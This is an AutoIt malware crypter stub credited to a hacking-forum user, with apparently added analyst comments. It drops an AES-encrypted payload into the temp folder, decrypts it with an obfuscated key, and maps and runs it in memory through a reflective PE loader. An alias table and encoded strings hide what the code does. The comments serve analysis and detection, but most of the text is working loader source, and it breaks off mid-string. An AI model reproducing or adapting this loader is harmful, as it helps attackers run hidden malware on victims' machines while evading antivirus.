- ; this has been offered by BrBi just give me +REP on hackforum as a sign of gratitude, ty!
- ; Function-name alias table. AutoIt lets a string variable be called as a
- ; function ($alias(args)), so every helper and library call in this script is
- ; reached through one of these names instead of being written out. The
- ; right-hand sides are the real targets (UDF wrappers such as _WinAPI_LoadLibrary,
- ; _Crypt_DecryptData, DllStructCreate, and the local functions BINDLL,
- ; DLLFROMMEMORY, FIXIMPORTS, FIXRELOC, ...). For analysis, read the rest of the
- ; file with this table as the symbol map. The names are built from the words
- ; ROOT/KERNEL/EXPLOIT/BYPASS/HOOK/ADMINISTRATION and carry no meaning of their
- ; own. Several aliases point at the same target (DLLSTRUCTCREATE, DLLSTRUCTGETDATA,
- ; SETERROR), presumably to make search-and-replace de-obfuscation less direct.
- $ROOTKERNELADMINISTRATIONROOT=BINDLL
- $ROOTADMINISTRATIONROOTEXPLOITKERNEL=_CRYPT_STARTUP
- $BYPASSKERNELEXPLOITEXPLOITBYPASS=BINARYTOSTRING
- $EXPLOITEXPLOITBYPASSHOOK=_CRYPT_DECRYPTDATA
- $KERNELKERNELADMINISTRATIONROOTHOOK=DLLFROMMEMORY
- $ADMINISTRATIONBYPASSROOTKERNELBYPASSEXPLOIT=DLLCLOSE
- $KERNELROOTEXPLOITEXPLOITADMINISTRATION=FILEOPEN
- $EXPLOITADMINISTRATIONBYPASSHOOK=FILEREAD
- $ADMINISTRATIONADMINISTRATIONEXPLOITKERNEL=FILECLOSE
- $ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION=DLLSTRUCTCREATE
- $ROOTADMINISTRATIONHOOKKERNELBYPASSEXPLOIT=BINARYLEN
- $ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION=DLLSTRUCTSETDATA
- $HOOKROOTKERNELROOTHOOK=DLLSTRUCTGETPTR
- $BYPASSEXPLOITHOOKEXPLOIT=DLLSTRUCTCREATE
- $KERNELBYPASSROOTADMINISTRATION=DLLSTRUCTGETDATA
- $HOOKHOOKADMINISTRATIONHOOK=DLLSTRUCTGETDATA
- $ROOTKERNELHOOKHOOKBYPASSROOT=SETERROR
- $ADMINISTRATIONADMINISTRATIONADMINISTRATIONROOTEXPLOIT=DLLSTRUCTCREATE
- $HOOKBYPASSADMINISTRATIONHOOKKERNEL=DLLSTRUCTGETDATA
- $HOOKROOTBYPASSROOTROOTADMINISTRATION=SETERROR
- $ADMINISTRATIONROOTEXPLOITHOOKROOTBYPASS=DLLSTRUCTCREATE
- $HOOKHOOKROOTKERNEL=DLLSTRUCTGETDATA
- $ADMINISTRATIONBYPASSROOTEXPLOIT=DLLSTRUCTCREATE
- $EXPLOITADMINISTRATIONROOTADMINISTRATIONKERNEL=DLLSTRUCTGETDATA
- $KERNELADMINISTRATIONADMINISTRATIONHOOK=SETERROR
- $HOOKROOTKERNELROOT=DLLSTRUCTCREATE
- $ROOTROOTBYPASSROOT=SETERROR
- $KERNELKERNELKERNELROOTBYPASS=DLLSTRUCTCREATE
- $ROOTADMINISTRATIONEXPLOITBYPASSKERNELHOOK=SETERROR
- $EXPLOITADMINISTRATIONHOOKBYPASS=DLLSTRUCTGETDATA
- $EXPLOITHOOKEXPLOITKERNELADMINISTRATIONROOT=DLLSTRUCTGETDATA
- $KERNELROOTBYPASSKERNEL=DLLSTRUCTGETDATA
- $EXPLOITROOTBYPASSADMINISTRATION=DLLSTRUCTCREATE
- $ADMINISTRATIONBYPASSROOTROOTADMINISTRATIONADMINISTRATION=DLLSTRUCTGETDATA
- $BYPASSBYPASSKERNELEXPLOITADMINISTRATION=DLLSTRUCTGETDATA
- $EXPLOITHOOKEXPLOITROOTHOOK=DLLSTRUCTCREATE
- $EXPLOITROOTKERNELADMINISTRATIONROOTHOOK=DLLSTRUCTGETDATA
- $ROOTROOTBYPASSADMINISTRATION=DLLSTRUCTGETDATA
- $HOOKEXPLOITKERNELBYPASSROOTEXPLOIT=UNMAPVIEWOFSECTION
- $BYPASSKERNELROOTADMINISTRATION=_MEMVIRTUALALLOC
- $BYPASSEXPLOITROOTKERNEL=DLLSTRUCTGETPTR
- $HOOKROOTADMINISTRATIONEXPLOITHOOK=DLLSTRUCTGETDATA
- $BYPASSADMINISTRATIONEXPLOITBYPASS=VIRTUALPROTECT
- $KERNELROOTROOTKERNELKERNEL=_WINAPI_FREELIBRARY
- $HOOKHOOKBYPASSKERNELHOOKROOT=SETERROR
- $ROOTROOTEXPLOITBYPASS=DLLSTRUCTSETDATA
- $HOOKHOOKEXPLOITROOTEXPLOITKERNEL=DLLSTRUCTCREATE
- $HOOKADMINISTRATIONBYPASSEXPLOITKERNEL=DLLSTRUCTGETDATA
- $BYPASSBYPASSADMINISTRATIONBYPASS=DLLSTRUCTCREATE
- $HOOKROOTADMINISTRATIONHOOKKERNEL=DLLSTRUCTCREATE
- $KERNELBYPASSEXPLOITBYPASS=DLLSTRUCTGETDATA
- $EXPLOITROOTKERNELADMINISTRATIONHOOK=DLLSTRUCTGETDATA
- $ADMINISTRATIONROOTADMINISTRATIONKERNEL=DLLSTRUCTGETDATA
- $HOOKADMINISTRATIONEXPLOITBYPASSROOT=DLLSTRUCTGETDATA
- $BYPASSADMINISTRATIONADMINISTRATIONADMINISTRATION=VIRTUALPROTECT
- $BYPASSHOOKBYPASSBYPASSROOTKERNEL=DLLSTRUCTSETDATA
- $HOOKEXPLOITKERNELBYPASSADMINISTRATION=DLLSTRUCTCREATE
- $ADMINISTRATIONEXPLOITKERNELHOOKBYPASSBYPASS=DLLSTRUCTGETDATA
- $BYPASSBYPASSHOOKHOOKKERNELADMINISTRATION=DLLSTRUCTCREATE
- $HOOKHOOKADMINISTRATIONEXPLOITHOOK=DLLSTRUCTSETDATA
- $BYPASSEXPLOITKERNELROOT=DLLSTRUCTCREATE
- $BYPASSEXPLOITBYPASSROOTBYPASS=DLLSTRUCTGETDATA
- $ROOTEXPLOITHOOKADMINISTRATIONBYPASSHOOK=DLLSTRUCTCREATE
- $ADMINISTRATIONADMINISTRATIONKERNELADMINISTRATIONKERNELHOOK=DLLSTRUCTCREATE
- $BYPASSKERNELEXPLOITKERNEL=FIXIMPORTS
- $ADMINISTRATIONEXPLOITEXPLOITADMINISTRATIONHOOK=DLLSTRUCTCREATE
- $ADMINISTRATIONKERNELBYPASSROOTROOTADMINISTRATION=FIXRELOC
- $ADMINISTRATIONADMINISTRATIONBYPASSHOOK=DLLCALLADDRESS
- $KERNELEXPLOITADMINISTRATIONROOTBYPASSADMINISTRATION=_WINAPI_FREELIBRARY
- $KERNELROOTKERNELHOOKKERNELROOT=DLLSTRUCTGETSIZE
- $ROOTADMINISTRATIONROOTBYPASSEXPLOIT=DLLSTRUCTGETPTR
- $EXPLOITKERNELBYPASSKERNELHOOK=DLLSTRUCTCREATE
- $ADMINISTRATIONKERNELBYPASSKERNEL=DLLSTRUCTGETDATA
- $KERNELADMINISTRATIONEXPLOITROOTEXPLOITADMINISTRATION=DLLSTRUCTGETDATA
- $EXPLOITHOOKKERNELADMINISTRATIONEXPLOITADMINISTRATION=DLLSTRUCTCREATE
- $EXPLOITROOTROOTADMINISTRATIONEXPLOIT=DLLSTRUCTGETPTR
- $ADMINISTRATIONHOOKROOTROOT=DLLSTRUCTGETDATA
- $ROOTBYPASSADMINISTRATIONADMINISTRATION=BITSHIFT
- $EXPLOITEXPLOITKERNELROOTHOOK=DLLSTRUCTCREATE
- $BYPASSBYPASSHOOKEXPLOIT=BITAND
- $KERNELEXPLOITHOOKEXPLOITADMINISTRATIONHOOK=DLLSTRUCTSETDATA
- $BYPASSHOOKHOOKROOTADMINISTRATIONROOT=DLLSTRUCTGETDATA
- $EXPLOITBYPASSADMINISTRATIONROOTADMINISTRATIONEXPLOIT=DLLSTRUCTGETPTR
- $BYPASSBYPASSEXPLOITBYPASS=DLLSTRUCTGETSIZE
- $BYPASSBYPASSADMINISTRATIONKERNELKERNEL=DLLSTRUCTCREATE
- $HOOKEXPLOITHOOKBYPASSKERNEL=DLLSTRUCTCREATE
- $HOOKHOOKBYPASSROOTKERNEL=DLLSTRUCTGETDATA
- $ROOTEXPLOITKERNELEXPLOIT=DLLSTRUCTGETDATA
- $KERNELHOOKROOTBYPASSADMINISTRATION=DLLSTRUCTCREATE
- $ROOTKERNELROOTROOTADMINISTRATIONBYPASS=_WINAPI_STRINGLENA
- $BYPASSKERNELKERNELBYPASSHOOKADMINISTRATION=DLLSTRUCTGETDATA
- $BYPASSEXPLOITEXPLOITROOTEXPLOITBYPASS=_WINAPI_LOADLIBRARY
- $KERNELHOOKHOOKADMINISTRATION=DLLSTRUCTGETDATA
- $ADMINISTRATIONKERNELBYPASSROOTADMINISTRATIONEXPLOIT=DLLSTRUCTGETDATA
- $ROOTKERNELEXPLOITHOOKROOT=DLLSTRUCTGETDATA
- $HOOKKERNELHOOKHOOKEXPLOIT=DLLSTRUCTCREATE
- $KERNELBYPASSBYPASSHOOKROOT=DLLSTRUCTGETDATA
- $HOOKKERNELROOTKERNELEXPLOIT=BITSHIFT
- $KERNELEXPLOITADMINISTRATIONROOTROOT=BINARYMID
- $BYPASSHOOKADMINISTRATIONHOOKBYPASSKERNEL=GETPROCADDRESS
- $KERNELKERNELKERNELROOTHOOKEXPLOIT=BITAND
- $EXPLOITADMINISTRATIONADMINISTRATIONADMINISTRATION=DLLSTRUCTCREATE
- $ADMINISTRATIONADMINISTRATIONROOTEXPLOIT=_WINAPI_STRINGLENA
- $KERNELADMINISTRATIONEXPLOITKERNEL=DLLSTRUCTGETDATA
- $BYPASSBYPASSADMINISTRATIONADMINISTRATION=GETPROCADDRESS
- $HOOKBYPASSHOOKBYPASSBYPASS=DLLSTRUCTSETDATA
- $KERNELHOOKKERNELHOOK=DLLSTRUCTCREATE
- $ADMINISTRATIONROOTEXPLOITHOOKADMINISTRATIONHOOK=DLLCALL
- $BYPASSHOOKHOOKHOOKKERNELHOOK=_WINAPI_GETCURRENTPROCESS
- $EXPLOITROOTROOTBYPASSKERNELHOOK=SETERROR
- $HOOKEXPLOITEXPLOITEXPLOITKERNELKERNEL=DLLCALL
- $EXPLOITADMINISTRATIONBYPASSROOT=SETERROR
- $EXPLOITEXPLOITKERNELHOOKKERNELBYPASS=ISNUMBER
- $BYPASSKERNELBYPASSBYPASS=DLLCALL
- $ADMINISTRATIONROOTEXPLOITBYPASSROOTKERNEL=SETERROR
- #NoTrayIcon
- #include <WinAPI.au3>
- #include <Memory.au3>
- #include <Crypt.au3>
- ; Entry flow of the stub (top-level statements run at script start; the tray icon
- ; is suppressed by #NoTrayIcon above):
- ;   1. FileInstall drops the embedded file "277.859016088769" into @TempDir
- ;      (flag 1 = overwrite).
- ;   2. BINDLL reads it back as a binary blob.
- ;   3. _Crypt_Startup / _Crypt_DecryptData decrypt it with $CALG_AES_256; the key
- ;      is produced by STRINGDEC; BinaryToString turns the result into a raw image.
- ;   4. DLLFROMMEMORY maps the decrypted image as a PE inside this process and
- ;      runs its entry point, then DllClose is called on the result. DLLFROMMEMORY
- ;      has no Return on its success path, so $HDLL is not a real DllOpen handle
- ;      and the DllClose is effectively a no-op.
- ; Analyst notes: the only on-disk artifact is the encrypted file in %TEMP%; the
- ; decrypted payload can be recovered by dumping $TEMP_DECRYPTED (or by breaking on
- ; the _Crypt_DecryptData / DLLFROMMEMORY alias calls) in a sandbox.
- FILEINSTALL("277.859016088769",@TEMPDIR&"/277.859016088769",1)
- $FILE=$ROOTKERNELADMINISTRATIONROOT(@TEMPDIR&"/277.859016088769")
- $ROOTADMINISTRATIONROOTEXPLOITKERNEL()
- $TEMP_DECRYPTED=$BYPASSKERNELEXPLOITEXPLOITBYPASS($EXPLOITEXPLOITBYPASSHOOK($FILE,STRINGDEC("usjrahxtezaapqoxpojhugijiagzyf","-15,-9,5,4,7,16,-9,4,3,-15,23,21,3,1,0,-10,-2,-1,7,14,-11,9,9,6,-1,19,13,-23,-23,14"),$CALG_AES_256))
- GLOBAL $HDLL=$KERNELKERNELADMINISTRATIONROOTHOOK($TEMP_DECRYPTED)
- $ADMINISTRATIONBYPASSROOTKERNELBYPASSEXPLOIT($HDLL)
- ; Read $SFILE completely in binary mode (FileOpen flag 16 = $FO_BINARY) and
- ; return the bytes; the handle is closed before returning. Used once, on the
- ; dropped encrypted payload file. No error handling: a failed open yields
- ; whatever FileRead returns for an invalid handle.
- FUNC BINDLL($SFILE)
- LOCAL $HFILE=$KERNELROOTEXPLOITEXPLOITADMINISTRATION($SFILE,16)
- LOCAL $BBINARY=$EXPLOITADMINISTRATIONBYPASSHOOK($HFILE)
- $ADMINISTRATIONADMINISTRATIONEXPLOITKERNEL($HFILE)
- RETURN $BBINARY
- ENDFUNC
- ; Reflective PE loader: maps the PE image held in $BBINARYIMAGE into this process
- ; by hand (no LoadLibrary, no file on disk) and runs its entry point. The flow is
- ; the usual manual-map sequence -- validate headers, allocate, copy headers and
- ; sections, resolve imports, apply relocations, call DllMain. It resembles the
- ; widely circulated AutoIt "MemoryDll" UDF with its struct strings passed through
- ; STRINGDEC; that lineage is an inference, not something this paste states.
- ; Error codes via SetError: 1 no "MZ", 2 no "PE" signature, 3 unknown or
- ; mismatched bitness, 6 VirtualProtect on the headers failed. Nothing is
- ; returned on the success path.
- ; Detection notes: the AutoIt process allocates a SizeOfImage block with
- ; MEM_RESERVE|MEM_COMMIT, flips every section to PAGE_EXECUTE_READWRITE, then
- ; issues bursts of LoadLibrary/GetProcAddress (FIXIMPORTS) and finally a
- ; DllCallAddress into the freshly written region.
- FUNC DLLFROMMEMORY($BBINARYIMAGE)
- ; Copy the image bytes into a byte[n] struct so they have a fixed address ($PPOINTER).
- LOCAL $TBINARY=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$ROOTADMINISTRATIONHOOKKERNELBYPASSEXPLOIT($BBINARYIMAGE)&"]")
- $ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION($TBINARY,1,$BBINARYIMAGE)
- LOCAL $PPOINTER=$HOOKROOTKERNELROOTHOOK($TBINARY)
- ; IMAGE_DOS_HEADER overlaid on the buffer (field list assembled from STRINGDEC pieces);
- ; $PPOINTER is then advanced by e_lfanew to the PE header.
- LOCAL $TIMAGE_DOS_HEADER=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("cafcpiykeudtenowwkcwacdibognfe","0,7,-5,15,-80,-28,-24,-4,4,-18,-9,-66,-8,-51")&STRINGDEC("ubkwizcimjccdlngsyozqnmibctpmy","2,13,7,-19,-73,-56,22,11,-8,9,-20,11,-24,-11,5,13,-35,-24,-8,-21,-54")&STRINGDEC("jkmnqgfdegisgbolkjuviexnjchhmj","13,4,5,-10,-81,-23,-5,3,0,12,-46")&STRINGDEC("juwfbhmxssmocpwtpbcobugkqfdcsx","13,-6,-5,-2,-66,-22,-8,-12,-4,-16,-12,5,6,-1,-9,-1,-53")&STRINGDEC("ororjsbobfeuexuctebiilpjrlwbzr","8,-3,3,-14,-74,-32,7,11,3,9,1,-45,0,-23,-17,2,-2,-42")&STRINGDEC("yukurzknzqmfrnbgfeknadgrlcswyd","-2,-6,7,-17,-82,-45,-2,0,-17,-4,8,7,-45,10,18,11,-5,-42")&STRINGDEC("hcitseforjnbwwlesemwhzsnsofyji","15,12,9,-16,-83,-24,-5,9,-9,3,7,11,-50,1,8,13,-18,-42")&STRINGDEC("pcmexevhoapcnowlhnqvbmfdgzwdtb","7,12,5,-1,-88,-18,-35,-45")&STRINGDEC("nfvqivdzbivpwjjjsfyhgurvhktyga","9,9,-4,-13,-73,-35,-20,-63")&STRINGDEC("iqydohopzirvzgokzikhdtrfrtinsr","14,-2,-7,0,-79,-37,-7,-11,-23,2,1,-1,-13,-44")&STRINGDEC("bbhshyiatjhkveqyxbnxvwhjxektqt","21,13,10,-15,-72,-48,-25,-38")&STRINGDEC("woomgigoagyltoukvhgfvckhehksjr","0,0,3,-9,-71,-38,-20,-52")&STRINGDEC("knlkwzunftsaagncrdvuhpvaxdquzx","12,1,6,-7,-87,-40,-16,-2,9,-17,-18,19,8,8,0,-40")&STRINGDEC("wtdvwapqykauuhxanlidtihynoqjfc","0,-5,14,-18,-87,-18,6,-12,-7,1,0,4,-58")&STRINGDEC("jblctkcwzafjjioqysnjrwngwtnmrd","-7,6,-11,15,-84,-25,2,-4,-21,17,16,-5,-6,-14,-55,-20,-62")&STRINGDEC("wpaoqzttzejeftoafhonsuzlhxurjq","0,-1,17,-11,-81,-43,-47,-39,-49,-1,-5,9,14,-11,-9,8,-1,10,-52")&STRINGDEC("bpsytbsqlyrrlgxuaqcfzgtdtdaygh","21,-1,-1,-21,-84,-19,-46,-36,-35,-11,-12,-3,6,6,-23,-1,8,-2,11,-43")&STRINGDEC("ueqmamdbvlcyewgqnzlmsxoomyrhzj","-18,3,-16,5,-65,-27,1,17,-17,6,19,-20,-1,-69,-12,-63,-62,-29,-49")&STRINGDEC("ynlokakmzhypfrkhblsjjpqbrtbhzm","-21,9,3,3,-7,-65,-42,-9,-22,10,-20,3,13,-35,-5,-26,3,11,-46,14,-5,-40,-12,-1,-14,-15,16"),$PPOINTER)
- $PPOINTER+=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_DOS_HEADER,STRINGDEC("dxokaffwazvbipoiudpyjghgnmrmtj","-35,-20,-11,7,4,13,13,-40,5,-44,-17,21,-36,8,-10,-33,-16,-3,-12,-20,8"))
- ; "MZ" DOS magic check -> @error 1.
- LOCAL $SMAGIC=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_DOS_HEADER,STRINGDEC("rijddzsrdudkbminhfxzclaedyujxh","-37,-8,-3,5,-1"))
- IF NOT ($SMAGIC=="MZ")THEN
- RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(1,0,0)
- ENDIF
- ; 17744 = 0x4550 = "PE\0\0"; anything else -> @error 2.
- LOCAL $TIMAGE_NT_SIGNATURE=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("vvxgrorfaveuzywnnofucsdksnzxpi","-18,1,-9,11,-14,-79,-31,3,6,-8,-4,-1,-5,-7,-18"),$PPOINTER)
- $PPOINTER+=4
- IF $KERNELBYPASSROOTADMINISTRATION($TIMAGE_NT_SIGNATURE,STRINGDEC("hfvlslrfzlxtfvheabssvtkdrwjdvd","-21,3,-15,2,-18,8,3,12,-21"))<>17744 THEN
- RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(2,0,0)
- ENDIF
- ; IMAGE_FILE_HEADER (20 bytes): only NumberOfSections is used later.
- LOCAL $TIMAGE_FILE_HEADER=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("retwkmufmhmqqqdufngfgdcsnpuhur","5,10,-2,-19,-75,-32,-20,-3,-5,1,1,-12,-54")&STRINGDEC("jkyhbzkqgtbnrbyvhdlfukgrzrptzq","13,4,-7,-4,-66,-44,10,-4,-5,-15,16,-31,-12,-15,-20,-19,12,5,3,8,-2,-48")&STRINGDEC("fgdaygtgtzkeiogftjplkmhulfitfm","-2,16,11,17,-21,-71,-32,2,-7,-21,-39,-4,11,-10,-20,14,-19,3,0,-49")&STRINGDEC("zopsbydhesjliykcpzsrvtfauhflxz","-22,8,-1,-1,2,-89,-20,7,4,-5,10,-7,9,-37,4,-16,9,-13,-17,-3,-10,-32,-5,1,-9,-3,-43")&STRINGDEC("flefcfumutnglnuaesxlfacuwsbvwu","-2,11,10,12,1,-70,-39,8,-8,-18,-9,11,-29,-8,-34,24,8,-17,-9,0,13,-38")&STRINGDEC("sirkouutovjrulplwkbwilyyfdsrvn","4,6,0,-7,-79,-34,-12,6,-10,-39,-4,-35,-5,8,-7,3,-9,-10,10,-47,-4,-11,-21,-20,12,-41")&STRINGDEC("bbvlnjrojihsqathczonmpdpebdxvt","21,13,-4,-8,-78,-39,-10,-14,8,-8,-5,1,-12,17,-11,11,17,-17,-12,5"),$PPOINTER)
- LOCAL $INUMBEROFSECTIONS=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_FILE_HEADER,STRINGDEC("gqpiikbiiqmkisxanzdkqymhrqxvgn","-25,4,-3,-7,-4,7,-19,-3,-22,-12,-10,9,0,-4,-10,18"))
- $PPOINTER+=20
- ; Optional-header Magic: 267 (0x10B) = PE32, 523 (0x20B) = PE32+. The image's
- ; bitness must match the running interpreter (@AutoItX64) -> @error 3 otherwise.
- ; The two layouts differ in the width of ImageBase/stack/heap fields, hence the
- ; 96 vs 112 bytes advanced to reach the data directories.
- LOCAL $TMAGIC=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("ltdxfwynlbjsvdanyihkuqwdrviztg","11,-5,14,-20,-70,-42,-24,-7,-3,1,-47"),$PPOINTER)
- LOCAL $IMAGIC=$KERNELBYPASSROOTADMINISTRATION($TMAGIC,1)
- LOCAL $TIMAGE_OPTIONAL_HEADER
- IF $IMAGIC=267 THEN
- IF @AUTOITX64 THEN RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(3,0,0)
- $TIMAGE_OPTIONAL_HEADER=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("ltdxfwynlbjsvdanyihkuqwdrviztg","11,-5,14,-20,-70,-42,-24,-7,-3,1,-47")&STRINGDEC("phtmbpkyvjtldmaevyoqfpsajvfkyr","-14,17,0,-8,-66,-35,-10,-15,-7,8,-40,-3,10,-2,4,13,-32,-20,3,2,3,-1,-5,-38")&STRINGDEC("pfrvamtwlzvahdajmnfnixukxqvjcn","-14,19,2,-17,-65,-32,-11,-9,3,-8,-42,8,6,7,4,8,-23,-9,12,5,0,-9,-7,-48")&STRINGDEC("zznqemumdcjfgbjqcxcfzdkzjgzraf","-22,-3,1,1,-1,-77,-34,-4,22,2,-27,0,-36,13,-6,-12,-40")&STRINGDEC("tgdxlnriionmhcmirelnaeboiclffe","-16,16,11,-6,-8,-78,-31,0,17,-10,-31,-7,-31,11,-4,11,-9,-4,0,-5,25,0,2,-43,-8,17,-11,-43")&STRINGDEC("anejkuipptdxyzpklmpuxkhkxqwuub","3,9,10,8,-7,-85,-22,-7,10,-15,-21,-18,-36,-12,-7,3,-3,7,-7,-20,-12,-2,18,-6,-20,-45,-22,-1,-20,-39")&STRINGDEC("cyotrfodsvhtzmzgavlxjcmpzjmpnq","1,-2,0,-2,-14,-70,-46,0,-15,-4,-3,-1,-7,-30,-20,-34,13,-2,6,1,-26,12,-4,-2,-6,-47")&STRINGDEC("ieqdjchuvhvquaxaaxfeicstnprmjy","-5,18,-2,14,-6,-67,-38,-20,-3,-3,-39,-11,-50,14,-20,4,-38")&STRINGDEC("rmoxhaieftsimilitgwvknhwnxxixz","-14,10,0,-6,-4,-65,-39,-4,13,-15,-36,-3,-41,-8,8,-8,-57")&STRINGDEC("ehjyoiekhvhjqdhnshxigdwplgzdbw","-1,15,5,-7,-11,-73,-28,2,-7,-15,-3,-40,-16,15,-3,-51")&STRINGDEC("exminvanugqcpyvxhdxhfyewdnjudn","-1,-1,2,9,-10,-86,-14,-9,-18,13,-8,12,-2,-56,-10,-15,-1,10,-11,-3,8,-5,-42")&STRINGDEC("ikovgnghvtwulshxaacxinhwmhwwhi","-5,12,0,-4,-3,-78,-33,1,-10,-15,-54,-9,-3,-12,6,-11,4,13,17,-61")&STRINGDEC("pkeodrwintgxsleputwcfakyqdjigk","7,4,13,-11,-68,-37,-22,1,1,-2,-24,-8,-14,6,-4,4,-12,-6,-16,-16,19,18,9,-20,-4,-14,-5,9,12,-2,-1,3,-42")&STRINGDEC("rsgizxjiqxfvzvpjysgpvumwnmxvgg","5,-4,11,-5,-90,-43,-1,5,-2,-6,-23,-6,-21,-4,-15,10,-16,-5,0,-29,3,-2,7,-18,-1,-23,-19,-4,12,2,-3,-5,-44")&STRINGDEC("ijyobiktanvrjgmgdsyofhppgikybt","14,5,-7,-11,-66,-28,-10,-10,14,4,-45,-5,-9,0,-8,-17,1,-1,-6,-6,9,6,-53")&STRINGDEC("whlayssemmndzorobazycfqwpgbnpx","0,7,6,3,-89,-38,-10,9,2,5,-37,9,-25,-8,-13,-25,3,17,-7,-16,12,8,-54")&STRINGDEC("uldpgdgovwxumqmmaaqgqyrwsda
inm","2,3,14,-12,-71,-23,-6,-5,-7,-5,-37,0,-11,2,12,6,19,4,-4,-17,-12,-7,1,-14,-4,10,-38")&STRINGDEC("hfnduqnrlbroybqslnaqoogukwuauv","15,9,4,0,-85,-36,-5,-4,3,16,-31,6,-23,17,8,0,8,-9,12,-27,-10,3,12,-12,4,-9,-58")&STRINGDEC("nqpaymclyzlckbvmscnwxywpjhkamg","-10,6,-1,17,-21,-77,-12,-3,-11,-71,-58,-13,-6,16,-3,-4,-4,11,-24,-22,-12,-4,-18,-53")&STRINGDEC("faxgbzxuuvjkpasfhvbxxknkonfdel","-2,22,-9,11,2,-90,-37,-12,5,-17,-27,-5,-39,12,-18,1,-3,-59")&STRINGDEC("gnobcrxmwoyuussmjbbpxzefcjmlve","-3,9,0,16,1,-82,-37,-4,3,-10,-42,-15,-45,-14,-18,-9,-5,16,17,-53")&STRINGDEC("ieyxrrajxyexgteibukaitgbzhpdkv","-5,18,-10,-6,-14,-82,-30,-2,-19,-22,6,-37,14,-7,-42")&STRINGDEC("cdjqrrkrxphgwfhemgenaxowhhhhmw","20,11,8,-13,-82,-31,10,-16,-5,9,11,13,-18,7,-45")&STRINGDEC("haihznoatxwzjhtxfddiskisnhgxyj","15,14,9,-4,-90,-42,-3,11,-49,-16,-22,-8,-9,-5,0,-19,12,5,15,11,-10,-8,10,-56")&STRINGDEC("hvwuctdpudbiwukfefxlukkajrxhml","-4,1,-8,-3,1,-84,-17,-7,5,1,-19,-3,-36,-1,-10,-3,6,-20,-19,7,-16,7,11,4,-47")&STRINGDEC("xpyocpucykwklmcgpnjfxxvgxrqzvn","-20,7,-10,3,1,-80,-34,6,1,-6,-40,-5,-25,7,-2,-4,-5,-43,5,7,-11,-15,-2,-44")&STRINGDEC("itqjjtiqkyprnswzkdzxizyyvyflwz","-5,3,-2,8,-6,-84,-22,-8,15,-20,-33,-12,-38,-14,-22,-10,-25,1,-7,-19,9,-4,-20,-62")&STRINGDEC("wcpvnygzkdwoiefiynhkyiymolexfb","-19,20,-1,-4,-10,-89,-20,-17,15,1,-40,-9,-33,0,-5,7,-54,1,5,2,-16,11,-62")&STRINGDEC("sxefhvsraekvuxabluizrsvvnrtxgg","-15,-1,10,12,-4,-86,-39,-3,0,-1,-6,-4,-47,-12,0,5,7,-58")&STRINGDEC("otffztxddrgbujlpiyxifduzuypdjq","-11,3,9,12,-22,-84,-42,17,9,-16,-2,16,-38,-4,-26,6,-8,-56,-10,-5,-19,5,5,-21,-2"),$PPOINTER)
- $PPOINTER+=96
- ELSEIF $IMAGIC=523 THEN
- IF NOT @AUTOITX64 THEN RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(3,0,0)
- $TIMAGE_OPTIONAL_HEADER=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("ltdxfwynlbjsvdanyihkuqwdrviztg","11,-5,14,-20,-70,-42,-24,-7,-3,1,-47")&STRINGDEC("phtmbpkyvjtldmaevyoqfpsajvfkyr","-14,17,0,-8,-66,-35,-10,-15,-7,8,-40,-3,10,-2,4,13,-32,-20,3,2,3,-1,-5,-38")&STRINGDEC("pfrvamtwlzvahdajmnfnixukxqvjcn","-14,19,2,-17,-65,-32,-11,-9,3,-8,-42,8,6,7,4,8,-23,-9,12,5,0,-9,-7,-48")&STRINGDEC("zznqemumdcjfgbjqcxcfzdkzjgzraf","-22,-3,1,1,-1,-77,-34,-4,22,2,-27,0,-36,13,-6,-12,-40")&STRINGDEC("tgdxlnriionmhcmirelnaeboiclffe","-16,16,11,-6,-8,-78,-31,0,17,-10,-31,-7,-31,11,-4,11,-9,-4,0,-5,25,0,2,-43,-8,17,-11,-43")&STRINGDEC("anejkuipptdxyzpklmpuxkhkxqwuub","3,9,10,8,-7,-85,-22,-7,10,-15,-21,-18,-36,-12,-7,3,-3,7,-7,-20,-12,-2,18,-6,-20,-45,-22,-1,-20,-39")&STRINGDEC("cyotrfodsvhtzmzgavlxjcmpzjmpnq","1,-2,0,-2,-14,-70,-46,0,-15,-4,-3,-1,-7,-30,-20,-34,13,-2,6,1,-26,12,-4,-2,-6,-47")&STRINGDEC("ieqdjchuvhvquaxaaxfeicstnprmjy","-5,18,-2,14,-6,-67,-38,-20,-3,-3,-39,-11,-50,14,-20,4,-38")&STRINGDEC("lrbrvkwljjlvqewtjweaygvboxavrf","9,-9,12,2,-64,-55,-87,-35,3,-9,-5,-17,-47,-4,-4,-15,-47")&STRINGDEC("exminvanugqcpyvxhdxhfyewdnjudn","-1,-1,2,9,-10,-86,-14,-9,-18,13,-8,12,-2,-56,-10,-15,-1,10,-11,-3,8,-5,-42")&STRINGDEC("ikovgnghvtwulshxaacxinhwmhwwhi","-5,12,0,-4,-3,-78,-33,1,-10,-15,-54,-9,-3,-12,6,-11,4,13,17,-61")&STRINGDEC("pkeodrwintgxsleputwcfakyqdjigk","7,4,13,-11,-68,-37,-22,1,1,-2,-24,-8,-14,6,-4,4,-12,-6,-16,-16,19,18,9,-20,-4,-14,-5,9,12,-2,-1,3,-42")&STRINGDEC("rsgizxjiqxfvzvpjysgpvumwnmxvgg","5,-4,11,-5,-90,-43,-1,5,-2,-6,-23,-6,-21,-4,-15,10,-16,-5,0,-29,3,-2,7,-18,-1,-23,-19,-4,12,2,-3,-5,-44")&STRINGDEC("ijyobiktanvrjgmgdsyofhppgikybt","14,5,-7,-11,-66,-28,-10,-10,14,4,-45,-5,-9,0,-8,-17,1,-1,-6,-6,9,6,-53")&STRINGDEC("w